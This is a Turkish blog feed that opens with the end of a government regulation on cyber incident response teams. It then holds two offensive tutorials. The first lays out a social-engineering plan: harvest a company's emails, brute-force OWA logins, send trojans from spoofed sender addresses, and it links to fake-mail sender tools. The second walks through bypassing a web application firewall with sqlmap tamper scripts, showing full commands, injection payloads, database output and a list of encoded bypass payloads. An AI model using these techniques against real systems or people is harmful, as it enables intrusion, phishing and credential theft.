(3) Sektörel SOME’ler siber olaylara ilişkin USOM tarafından iletilen alarm, uyarı ve duyuruları dikkate alarak birlikte çalıştıkları SOME’lerde gerekli tedbirlerin alınmasına yönelik çalışmaları yürütürler.<br />
(4) Sektörel SOME’ler birlikte çalıştıkları SOME’lerin yapılanması konusunda düzenleyici faaliyetleri yürütürler.<br />
(5) Sektörel SOME’ler ilgili oldukları sektörde, bilgilendirme, bilinçlendirme ve eğitim faaliyetleri ile siber güvenlikle ilgili kabiliyetlerinin geliştirilmesi ve önlemlerin alınması konusunda gerekli düzenleyici faaliyetleri yürütürler.<br />
(6) Sektörel SOME’ler 7/24 erişilebilir olan iletişim bilgilerini belirleyerek birlikte çalıştıkları SOME’lere ve USOM’a bildirirler.<br />
(7) SOME’ler 7/24 erişilebilir olan iletişim bilgilerini Sektörel SOME’lere ve USOM’a bildirirler.<br />
(8) Sektörel SOME’ler birlikte çalıştıkları SOME’lerde yaşanan siber olaylarda imkânları ölçüsünde gerekli desteği sağlarlar. Sektörel SOME’ler, imkânlarının yetersiz olması durumunda USOM’dan destek alırlar.<br />
(9) Sektörel SOME’ler siber olaya müdahale ederken suç işlendiği izlenimi veren bir durumla karşılaştıklarında gecikmeksizin durumu kanunen yetkili makamlara bildirirler. Durumu gecikmeksizin USOM’a da bildirirler.<br />
(10) Sektörel SOME’ler gerekmesi durumunda birlikte çalıştıkları SOME’ler arasındaki işbirliğini koordine ederler.<br />
<br />
<b>Kurumsal ve Sektörel SOME’lerin Yapısı</b><br />
<b>MADDE 8</b> − (1) SOME’lerin Bakanlık ve diğer kurumlar içinde nasıl yapılandırılacağı, hangi birim içinde çalışacağı, Bakanlığın veya kurumun diğer birimleri ile ilişkileri, bilişim ve endüstriyel kontrol sistemlerinin yapısı da dikkate alınarak ilgili Bakanlık veya kurum tarafından belirlenir ve kurum içerisinde uygun yöntem ile duyurulur.<br />
(2) SOME’ler kurumların bilişim ve endüstriyel kontrol sistemlerinin büyüklük ve kritikliği dikkate alınarak meydana gelebilecek siber olaya müdahale edebilecek yeterlilikte personel ve teçhizatla desteklenirler.<br />
(3) SOME’ler; bilgi güvenliği, bilişim ağları, yazılım ve sistem uzmanlığı gibi alanlarda bilgili ve tecrübeli personel öncelikli olmak üzere ilgili bakanlık ve kurumların belirleyeceği personelden teşkil edilir.<br />
(4) Mevcut ve olası siber olayların niteliği ve yoğunluğuna göre USOM tarafından bu yapıların geliştirilmesi önerilebilir.<br />
(5) SOME’ler iletişim kanallarını 7/24 açık tutarlar.<br />
(6) SOME’ler siber olaylara imkânları dâhilinde 7/24 esasına göre müdahale ederler.<br />
(7) SOME’ler, ilgili kurumların teşkilat yapılarına ve hizmet gereklerine göre farklı birim personelinden oluşturulabilir.<br />
<br />
<b>SOME’lerin USOM’la İlişkisi</b><br />
<b>MADDE 9</b> − (1) SOME’lerin USOM ile ilişkilerini varsa birlikte çalıştıkları sektörel SOME’ler üzerinden yürütmesi esastır.<br />
(2) Birlikte çalıştıkları bir sektörel SOME olmayan kurumsal SOME’ler, faaliyetlerini doğrudan USOM ile koordineli yürütürler.<br />
(3) Siber olaylar ile ilgili olarak diğer ülkelerin eşdeğer makamları ve uluslararası kuruluşlarla işbirliği USOM tarafından yerine getirilir.<br />
(4) USOM gerekli gördüğü durumlarda kurumsal SOME’ler ve sektörel SOME’ler ile doğrudan çalışma yürütebilir.<br />
(5) Kurumsal/Sektörel SOME’ler siber olayların tespiti, önlenmesi, zararlarının en aza indirilmesi gibi konularda USOM tarafından geliştirilen veya yürütülen projelerin gerçekleştirilmesinde USOM ile işbirliği içerisinde hareket ederler.<br />
<br />
<b>Eğitim</b><br />
<b>MADDE 10</b> − (1) Kurumsal SOME’ler, USOM ve/veya birlikte çalıştıkları sektörel SOME’lerin planladığı eğitimlere katılım sağlar.<br />
(2) Sektörel SOME’ler, USOM’un planladığı eğitimlere katılım sağlar.<br />
<br />
<b>Siber Güvenlik Kurulu</b><br />
<b>MADDE 11</b> − (1) Siber güvenlikle ilgili olarak alınacak önlemleri belirlemek, hazırlanan plan, program, rapor, usul, esas ve standartları onaylamak ve bunların uygulanmasını ve koordinasyonunu sağlamak amacıyla; Ulaştırma, Denizcilik ve Haberleşme Bakanının başkanlığında Dışişleri, İçişleri, Milli Savunma, Ulaştırma, Denizcilik ve Haberleşme bakanlıkları müsteşarları, Kamu Düzeni ve Güvenliği Müsteşarı, Milli İstihbarat Teşkilatı Müsteşarı, Genelkurmay Başkanlığı Muhabere Elektronik ve Bilgi Sistemleri Başkanı, Bilgi Teknolojileri ve İletişim Kurumu Başkanı, Türkiye Bilimsel ve Teknolojik Araştırma Kurumu Başkanı, Mali Suçları Araştırma Kurulu Başkanı, Telekomünikasyon İletişim Başkanı ile Ulaştırma, Denizcilik ve Haberleşme Bakanınca belirlenecek bakanlık ve kamu kurumlarının üst düzey yöneticilerinden oluşan Siber Güvenlik Kurulu kurulmuştur.<br />
<br />
<b>Yürürlük</b><br />
<b>MADDE 12</b> − (1) Bu Tebliğ yayımı tarihinde yürürlüğe girer.<br />
<br />
<b>Yürütme</b><br />
<b>MADDE 13</b> − (1) Bu Tebliğ hükümlerini Ulaştırma, Denizcilik ve Haberleşme Bakanı yürütür.İsmail Saygılıhttp://www.blogger.com/profile/09930086809196220105noreply@blogger.com0tag:blogger.com,1999:blog-925370819781376022.post-36411530177299004972013-12-03T17:31:00.002+02:002018-10-25T15:15:20.475+03:00Sosyal Mühendislik Saldırılarında Sahte Mail Kullanımı<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjprJoE_0OmfgMIzP59KhTbEjnPVG1wRTK0mQ5xykFXyHgziKCG9SGl8AAjDX2Ge8O1_JCIQYbEc1MeKa5p_4DQb4jRHGyTvdJtlm2EPuq7XPMGGSc92bhSsmxtji7aSHjTfaze9KRrPQQ7/s1600/sosyalmuhendislik.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="268" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjprJoE_0OmfgMIzP59KhTbEjnPVG1wRTK0mQ5xykFXyHgziKCG9SGl8AAjDX2Ge8O1_JCIQYbEc1MeKa5p_4DQb4jRHGyTvdJtlm2EPuq7XPMGGSc92bhSsmxtji7aSHjTfaze9KRrPQQ7/s320/sosyalmuhendislik.png" width="320" /></a></div>
Merhaba arkadaşlar. Sosyal mühendislik saldırılarında en çok kullanılan yöntemlerden biri olan <b>Fake (Sahte) Mail</b> ve buna karşı nasıl tedbirler alınabilir bu konulara değineceğim. Sosyal mühendislikte Fake Mail kullanarak hedefli saldırı gerçekleştirmek için bir senaryo ve varolan senaryonun alternatifi şeklinde konuyu anlatmak istiyorum.<br />
<b><i>Senaryo</i></b><br />
<u>Amaç:</u> Hedefteki şirkete/kuruma ait e-mail adreslerinin toplanıp, bu e-mail adreslerine zayıf parola saldırısı yaparak bir e-mail hesabı ele geçirmek ve ele geçirilen e-mail hesabıyla hedefteki şirket için tespit edilen diğer e-mail adreslerine zararlı dosya (trojan) gönderip şirketi içerden fethetmek.<br />
<u>NOT:</u> <i>Şirket Microsoft Exchange mail servisini kullanıyorsa OWA'ya yönelik zayıf parola saldırısını Eyüp Çelik'in hOWAttacker yazılımını veya Metasploit'teki <b>owa_login</b> modülünün kullanımını öneririm.</i><br />
<br />
<b><i>Alternatif Senaryo</i></b><br />
Hedefteki şirkete ait tespit edilen e-mail adreslerine yapılan zayıf parola saldırısı ile bir sonuç alınmadıysa devreye Fake (Sahte) Mail kullanma girecektir. Ve biz alternatif senaryoyu kullanacağız.<br />
<br />
İlk olarak <b>theHarvester</b> veya <b>Maltego</b> araçlarına kullanarak hedef şirkete ait e-mail adreslerini toplayabiliriz.<br />
<br />
<b><span style="color: red;">theHarvester Örneği</span></b><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiaEUlIdDwRxEzoqhCHiGA3AOpqhCa269_Eg6CD4NO3gGrcOsiAS9l2xVHYo6WAfEqvXa7UzPEzFhYAjYY_AtV9Y91Gz5Qwti_C80Y75U0zirmT_sbZKKSL4mib02CLR1JX7kM0YUBZJGqT/s1600/theHarvester.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="215" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiaEUlIdDwRxEzoqhCHiGA3AOpqhCa269_Eg6CD4NO3gGrcOsiAS9l2xVHYo6WAfEqvXa7UzPEzFhYAjYY_AtV9Y91Gz5Qwti_C80Y75U0zirmT_sbZKKSL4mib02CLR1JX7kM0YUBZJGqT/s320/theHarvester.png" width="320" /></a></div>
<br />
<br />
<b><span style="color: red;">Maltego Örneği</span></b><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgu36U2Ua5TyI0j65FSI9lMi2SZYQahTn7xGxLRp2XYAQIXPg4cI_G2Lea4GcnBlNJDvn5vgfBE8gjFd4HR-74wsZVV62t8CA2pSt6RyZiNErMjtWFU5S8-6SfxJiDE-aBCXut3YlJRnHgs/s1600/maltego1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="149" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgu36U2Ua5TyI0j65FSI9lMi2SZYQahTn7xGxLRp2XYAQIXPg4cI_G2Lea4GcnBlNJDvn5vgfBE8gjFd4HR-74wsZVV62t8CA2pSt6RyZiNErMjtWFU5S8-6SfxJiDE-aBCXut3YlJRnHgs/s320/maltego1.png" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEirFNc7JnV4ZmdOhYtQeCgCHp8Eb5kdjBzpkCpC0cTAx3DjaMejVDx9Sp1ffqDB60x-FWSRpcLH2NOQGCz8S-85GUmG9nHCe8ynhNFa8RvGJKM5PO93hKMY9SJlQZEzUHRiVSXWLLDm1XVq/s1600/maltego2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="164" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEirFNc7JnV4ZmdOhYtQeCgCHp8Eb5kdjBzpkCpC0cTAx3DjaMejVDx9Sp1ffqDB60x-FWSRpcLH2NOQGCz8S-85GUmG9nHCe8ynhNFa8RvGJKM5PO93hKMY9SJlQZEzUHRiVSXWLLDm1XVq/s320/maltego2.png" width="320" /></a></div>
<br />
Alternatif senaryoyu kullanacağımıza göre şuan ihtiyacımız olan şey fake mail servisidir, 4 adet fake mail servisi hazırladım buradan indirebilirsiniz <b><span style="color: red;">>>></span> <a href="http://yadi.sk/d/c-iGBTk5DjEMv" target="_blank">İndir / Download</a></b><br />
<br />
<a name='more'></a><br />
Ben indireceğiniz dosyalardan ilk olanını kullanacağım<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjs873weOIA9jHQjrAnlSpdrKxbV09FAAKR0ZZOOoU4fNSp46EaW4L8fiMQQo66UR7O5EdNN1TzssosQ7lkAeb__qx0_WiFZrB29gRPMtvLTJAqVeJw344zSg0LLRdifjss1tr0g-bviwab/s1600/sahte-fake-mail.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjs873weOIA9jHQjrAnlSpdrKxbV09FAAKR0ZZOOoU4fNSp46EaW4L8fiMQQo66UR7O5EdNN1TzssosQ7lkAeb__qx0_WiFZrB29gRPMtvLTJAqVeJw344zSg0LLRdifjss1tr0g-bviwab/s400/sahte-fake-mail.png" width="340" /></a></div>
Yukarıdaki resimde yer alan kısımları açıklamak gerekirse;<br />
<b>From Name:</b> Gönderen kişinin adı ve soyadı. (Kimin adına e-posta gönderilecekse onun ad ve soyadı yazılmalı)<br />
<b>From E-Mail:</b> Gönderen kişinin e-mail adresi. (Kimin adına e-posta gönderilecekse onun e-mail adresi yazılmalı, örneğin <i>support@google.com</i> gibi..)<br />
<b>To:</b> E-posta kişinin e-mail adresi. (Hedef kişinin e-mail adresi yazılmalı)<br />
<b>Subject:</b> Gönderilecek olan e-posta konusu.<br />
<b>Attachment:</b> Varsa ekli dosya bu seçeneği kullanarak hedef kişiye dosya da gönderebilirsiniz.<br />
<b>Content-Type:</b> Editör seçimi. (text/html olanını öneririm, gelişmiş yazı editördür)<br />
<b>Text:</b> Hedefe gönderilecek olan e-postanın içeriği.<br />
<b>Captcha:</b> Güvenlik kodu.<br />
<b>Send:</b> Son olarak bu butona bastığınızda e-postanız hedef kişinin e-mail adresine gönderilecektir.<br />
<br />
Aşağıdaki resimlerde gördüğünüz gibi <i>ism4ils4ygili@gmail.com</i> olan kendi adresime Bill Gates'den geliyormuş gibi bir e-posta gönderme denemesi yaptım, nasıl olmuş, güzel değil mi? :)<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi4oSps7MEGDBZeYNJ54v16gFqMYYieysFdaTE38H_BkYXhUipt-g5F6Z-I5vScPpTxXIOWugyrn4Bxjf2hKla4gW_9bB0sBDTlKAiygrlwrcOJe8XFCzMThgntNuh4dTuAzDMW3KNmbE9C/s1600/sahte-fake-mail3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi4oSps7MEGDBZeYNJ54v16gFqMYYieysFdaTE38H_BkYXhUipt-g5F6Z-I5vScPpTxXIOWugyrn4Bxjf2hKla4gW_9bB0sBDTlKAiygrlwrcOJe8XFCzMThgntNuh4dTuAzDMW3KNmbE9C/s400/sahte-fake-mail3.png" width="396" /></a></div>
<br />
Gelen e-postanın görüntüsü;<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgrLsDgo3NqabwN9Qiia3ILfrfw3F4H67KVkRWfV-ct5BMyWCmqIu0Ww6Ew3IKskNVtwdPzvu57xeIDP8IlmVrV1tZPJFsmB9SVlcYMYxQkTeimTJihtCypBTQBK7l06YkEGpXlzO38jlem/s1600/sahte-fake-mail4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="205" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgrLsDgo3NqabwN9Qiia3ILfrfw3F4H67KVkRWfV-ct5BMyWCmqIu0Ww6Ew3IKskNVtwdPzvu57xeIDP8IlmVrV1tZPJFsmB9SVlcYMYxQkTeimTJihtCypBTQBK7l06YkEGpXlzO38jlem/s400/sahte-fake-mail4.png" width="400" /></a></div>
<br />
E-postanın içeriği;<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhuTs0bQBYKpQuAfWEJp1DE36z54Bk7-JkscctyDH_JP03TmNRRyebaaMFQD6-m6m8uo3RsoVqFoOyHC99giE2P5PYQ6HvYmlCgcQnqJSd1PRrRhVw64mz_T0v2YC6PrvDIHFjPF_eLWBln/s1600/sahte-fake-mail5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="203" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhuTs0bQBYKpQuAfWEJp1DE36z54Bk7-JkscctyDH_JP03TmNRRyebaaMFQD6-m6m8uo3RsoVqFoOyHC99giE2P5PYQ6HvYmlCgcQnqJSd1PRrRhVw64mz_T0v2YC6PrvDIHFjPF_eLWBln/s400/sahte-fake-mail5.png" width="400" /></a></div>
<br />
<b>Peki gelen e-postanın fake (sahte) olup olmadığını nasıl öğrenebiliriz?</b><br />
E-postanın kaynağını görüntüleyerek tam olarak nereden geldiğinin detaylarına bakabilirsiniz:<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgepcfwU1-IYFmdaZDcK2R-mv1clpMdRZUy-Cez6N-D97viQntou3jjA-1zmZJRAc0EsMmYi4YLwHbsZ9SXNgbLtUO1_MbD8Hg1lGwRGRPQshqy4aNXH9mYX5KgzHtT3qwkt0zIlmHmlM9e/s1600/sahte-fake-mail6.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="164" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgepcfwU1-IYFmdaZDcK2R-mv1clpMdRZUy-Cez6N-D97viQntou3jjA-1zmZJRAc0EsMmYi4YLwHbsZ9SXNgbLtUO1_MbD8Hg1lGwRGRPQshqy4aNXH9mYX5KgzHtT3qwkt0zIlmHmlM9e/s320/sahte-fake-mail6.png" width="320" /></a><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjTwea5HWO8EgjCJ2Y8flNvANVFv-Ryf4__igE7zxXOnZi0bhsXxVwJ_ZkB_IeH4H2dF4pWovGVvRte2kq5GW8JYJk6CoadYfa9qWMGSIPQJPSbJ-94UuQ4DHEXYhKWG3uckAr1-8SuJYRR/s1600/sahte-fake-mail7.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="164" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjTwea5HWO8EgjCJ2Y8flNvANVFv-Ryf4__igE7zxXOnZi0bhsXxVwJ_ZkB_IeH4H2dF4pWovGVvRte2kq5GW8JYJk6CoadYfa9qWMGSIPQJPSbJ-94UuQ4DHEXYhKWG3uckAr1-8SuJYRR/s320/sahte-fake-mail7.png" width="320" /></a></div>
<br />
İyi çalışmalar..İsmail Saygılıhttp://www.blogger.com/profile/09930086809196220105noreply@blogger.com1tag:blogger.com,1999:blog-925370819781376022.post-34069853698421938952013-09-09T16:50:00.005+03:002020-10-22T00:35:04.472+03:00SQLmap'i WAF Bypass (Tamper) Scriptleri ile Kullanma<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjmdtbUNatiPbsN5sGKoK10r4pWtMgS9QGdE62liY6shuRb9HqadY8ZM0Q7PApe3AVlWgy8V1yW_DZhkPiEwgtKrbXntlsJgGicup9QXc64PhjxXKxbHiiaWHE3xY7r9nKU2nYzKbKjNpLf/s1600/sqlmap.png" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjmdtbUNatiPbsN5sGKoK10r4pWtMgS9QGdE62liY6shuRb9HqadY8ZM0Q7PApe3AVlWgy8V1yW_DZhkPiEwgtKrbXntlsJgGicup9QXc64PhjxXKxbHiiaWHE3xY7r9nKU2nYzKbKjNpLf/s1600/sqlmap.png" /></a></div>
Hedef web uygulamada <b>SQL Injection</b> güvenlik açığı tespit edilse bile normal şartlarda <b>Sqli</b> komutları işlem görmüyorsa büyük ihtimalle uygulamanın önünde konumlandırılan bir <b>WAF (Web Application Firewall)</b> tarafından algılanıp engelleniyordur.<br />
<br /><b>
SQL Injection saldırıları</b>nda çeşitli <b>bypass (atlatma) yöntemleri</b> kullanırız, örneğin;<br />
büyük küçük harf karmaşası, komutların çeşitli algoritmalarla encode edilmesi gibi...<br />
<br /><b>
SQLmap</b>'in <b>WAF, IPS</b> gibi saldırı engelleme sistemlerini bypass etmesi için "<b>tamper script</b>" özelliği bulunmaktadır.<br />
<br />
Aşağıda WAF kullanan bir sisteme SQLmap'in varsayılan kullanım parametresi verilmiştir ve sonuç alınamamıştır:<br />
<br />
<a name='more'></a><br />
<blockquote class="tr_bq">
root@bt: <b><i>sqlmap -u "http://1.2.3.4/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=medium; PHPSESSID=de9fd298875093226427e5475c47b5eb" --dbs</i></b> </blockquote>
<blockquote class="tr_bq">
sqlmap - automatic SQL injection and database takeover tool<br />
http://sqlmap.org </blockquote>
<blockquote class="tr_bq">
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program<br />
[*] starting at 15:39:43<br />
[15:39:43] [INFO] testing connection to the target url<br />
[15:39:43] [INFO] heuristics detected web page charset 'ascii'<br />
[15:39:43] [WARNING] reflective value(s) found and filtering out<br />
[15:39:43] [INFO] heuristic (parsing) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')<br />
[15:39:43] [INFO] testing for SQL injection on GET parameter 'id'<br />
[15:39:43] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'<br />
[15:39:43] [CRITICAL] unable to connect to the target url or proxy. sqlmap is going to retry the request<br />
[15:39:44] [CRITICAL] unable to connect to the target url or proxy. sqlmap is going to retry the request<br />
[15:39:45] [CRITICAL] unable to connect to the target url or proxy. sqlmap is going to retry the request<br />
[15:39:46] [CRITICAL] unable to connect to the target url or proxy<br />
[15:39:46] [CRITICAL] unable to connect to the target url or proxy. sqlmap is going to retry the request<br />
[15:39:47] [CRITICAL] unable to connect to the target url or proxy. sqlmap is going to retry the request<br />
[15:39:48] [CRITICAL] unable to connect to the target url or proxy. sqlmap is going to retry the request</blockquote>
<br />
Görüldüğü gibi hedef sistemde UNION komutu geçtiğinde istekleri engelleyen bir yapı bulunmaktadır..<br />
<br />
Şimdi ise bir de SQLmap'i <b>--tamper</b> fonksiyonuyla birlikte kullanalım:<br />
<blockquote class="tr_bq">
root@pentest: <b><i>sqlmap -u "http://1.2.3.4/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=medium; PHPSESSID=de9fd298875093226427e5475c47b5eb" --tamper "randomcase" --dbs</i></b> </blockquote>
<blockquote class="tr_bq">
[*] starting at 16:16:24 </blockquote>
<blockquote class="tr_bq">
<b>[16:16:24] [INFO] <span style="color: red;">loading tamper script 'randomcase'</span></b><br />
[16:16:24] [INFO] testing connection to the target url<br />
[16:16:25] [INFO] testing if the url is stable, wait a few seconds<br />
[16:16:26] [INFO] url is stable<br />
[16:16:26] [INFO] testing if GET parameter 'id' is dynamic<br />
[16:16:26] [WARNING] GET parameter 'id' appears to be not dynamic<br />
[16:16:26] [INFO] heuristics detected web page charset 'ascii'<br />
[16:16:26] [WARNING] reflective value(s) found and filtering out<br />
[16:16:26] [INFO] heuristic test shows that GET parameter 'id' might be injectable (possible DBMS: MySQL)<br />
[16:16:26] [INFO] testing for SQL injection on GET parameter 'id'<br />
[16:16:26] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'<br />
[16:16:26] [INFO] GET parameter 'id' seems to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string='Surname: admin')<br />
[16:16:26] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'<br />
[16:16:26] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' injectable<br />
[16:16:26] [INFO] testing 'MySQL > 5.0.11 stacked queries'<br />
[16:16:26] [WARNING] time-based comparison needs larger statistical model. Making a few dummy requests, please wait.. <br />
[16:16:27] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'<br />
[16:16:37] [INFO] GET parameter 'id' is 'MySQL > 5.0.11 AND time-based blind' injectable<br />
[16:16:37] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'<br />
[16:16:37] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other injection technique found<br />
[16:16:37] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test<br />
[16:16:37] [INFO] target url appears to have 2 columns in query<br />
[16:16:37] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable<br />
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N<br />
sqlmap identified the following injection points with a total of 19 HTTP(s) requests:<br />
---<br />
Place: GET<br />
Parameter: id<br />
Type: boolean-based blind<br />
Title: AND boolean-based blind - WHERE or HAVING clause<br />
Payload: id=1 AND 3106=3106&Submit=Submit<br />
Type: error-based<br />
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br />
Payload: id=1 AND (SELECT 2385 FROM(SELECT COUNT(*),CONCAT(0x3a72796b3a,(SELECT (CASE WHEN (2385=2385) THEN 1 ELSE 0 END)),0x3a6b6e693a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&Submit=Submit<br />
Type: UNION query<br />
Title: MySQL UNION query (NULL) - 2 columns<br />
Payload: id=1 LIMIT 1,1 UNION ALL SELECT CONCAT(0x3a72796b3a,0x4f676a51626745675562,0x3a6b6e693a), NULL#&Submit=Submit<br />
Type: AND/OR time-based blind<br />
Title: MySQL > 5.0.11 AND time-based blind<br />
Payload: id=1 AND SLEEP(5)&Submit=Submit<br />
---<br />
[16:16:41] [INFO] changes made by tampering scripts are not included in shown payload content(s)<br />
[16:16:41] [INFO] the back-end DBMS is MySQL<br />
web server operating system: Windows<br />
web application technology: PHP 5.2.6, Apache 2.2.8<br />
back-end DBMS: MySQL 5.0<br />
[16:16:41] [INFO] fetching database names<br />
available databases [5]:<br />[*] dvwa<br />
[*] information_schema<br />
[*] mysql<br />
[*] phpmyadmin<br />
[*] test<br />[16:16:41] [INFO] fetched data logged to text files under '/pentest/database/sqlmap/output/192.168.1.127'<br />
[*] shutting down at 16:16:41</blockquote>
<br />
Görüldüğü gibi hedef sistemdeki koruyucu mekanizma atlatılmış oldu..<br />
<br />
SQLmap'in yüklü olduğu dizinde "<b>tamper</b>" isimli klasörde çeşitli bypass script'leri bulunmaktadır. Biz yukarıdaki testte "tamper" klasörünün içinde "<b>randomcase</b>" script'inden faydalandık. Bu script'in görevi, <b>UNION </b>gibi <b>Sql </b>komutlarını rastgele büyük-küçük harf şeklinde düzenleyerek karşı sisteme yollar ve WAF var ise bypass edilmeye çalışılır.<br />
<br />
Aşağıda tamper klasöründe bulunan diğer bypass script'lerinin isimleri, bypass yöntemleri ve hangi veritabanı platformlarında işlevi olduğunu paylaştım:<br />
<br />
<br />
<b><span style="color: red;">apostrophemask.py (UTF-8)</span></b><br />
Örnek:<br />
* Orijinal Komut: <b>AND '1'='1'</b><br />
* Bypass Komutu: <b>AND %EF%BC%871%EF%BC%87=%EF%BC%871%EF%BC%87</b><br />
<br />
<b><span style="color: red;">apostrophenullencode.py (unicode)</span></b><br />
Örnek:<br />
* Orijinal Komut: <b>AND '1'='1'</b><br />
* Bypass Komutu: <b>AND %271%27=%271%27</b><br />
<br />
<b><span style="color: red;">appendnullbyte.py ()</span></b><br />
Örnek:<br />
* Orijinal Komut: <b>AND 1=1</b><br />
* Bypass Komutu: <b>AND 1=1</b><br />
Platform:<br />
* Microsoft Access<br />
<br />
<b><span style="color: red;">base64encode.py (base64)</span></b><br />
Örnek:<br />
* Orijinal Komut: <b>1' AND SLEEP(5)#</b><br />
* Bypass Komutu: <b>MScgQU5EIFNMRUVQKDUpIw==</b><br />
<br />
<b><span style="color: red;">between.py (“not between” “>”)</span></b><br />
Örnek:<br />
* Orijinal Komut: <b>'A > B'</b><br />
* Bypass Komutu: <b> 'A NOT BETWEEN 0 AND B'</b><br />
<br />
<b><span style="color: red;">bluecoat.py (“like” “=”)</span></b><br />
Örnek:<br />
* Orijinal Komut: <b>SELECT id FROM users where id = 1</b><br />
* Bypass Komutu: <b>SELECT%09id FROM users where id LIKE 1</b><br />
Platform:<br />
* MySQL 5.1, SGOS<br />
<br />
<b><span style="color: red;">chardoubleencode.py</span></b><br />
Örnek:<br />
* Orijinal Komut: <b>SELECT FIELD FROM%20TABLE</b><br />
* Bypass Komutu: <b>%2553%2545%254c%2545%2543%2554%2520%2546%2549%2545%254c%2544%2520%2546%2552%254f%254d%2520%2554%2541%2542%254c%2545</b><br />
<br />
<b><span style="color: red;">charencode.py</span></b><br />
Örnek:<br />
* Orijinal Komut: <b>SELECT FIELD FROM%20TABLE</b><br />
* Bypass Komutu: <b> %53%45%4c%45%43%54%20%46%49%45%4c%44%20%46%52%4f%4d%20%54%41%42%4c%45</b><br />
<br />
<b><span style="color: red;">charunicodeencode.py</span></b><br />
Örnek:<br />
* Orijinal Komut: <b>SELECT FIELD%20FROM TABLE</b><br />
* Bypass Komutu: <b>%u0053%u0045%u004c%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004c%u0044%u0020%u0046%u0052%u004f%u004d%u0020%u0054%u0041%u0042%u004c%u0045'</b><br />
Platform:<br />
* ASP<br />
* ASP.NET<br />
<br />
<b><span style="color: red;">equaltolike.py (“like” “=”)</span></b><br />
Örnek:<br />
* Orijinal Komut: <b>SELECT * FROM users WHERE id=1</b><br />
* Bypass Komutu: <b>SELECT * FROM users WHERE id LIKE 1</b><br />
<br />
<b><span style="color: red;">halfversionedmorekeywords.py</span></b><br />
Örnek:<br />
* Orijinal Komut: value<b>' UNION ALL SELECT CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULL, NULL# AND 'QDWa'='QDWa</b><br />
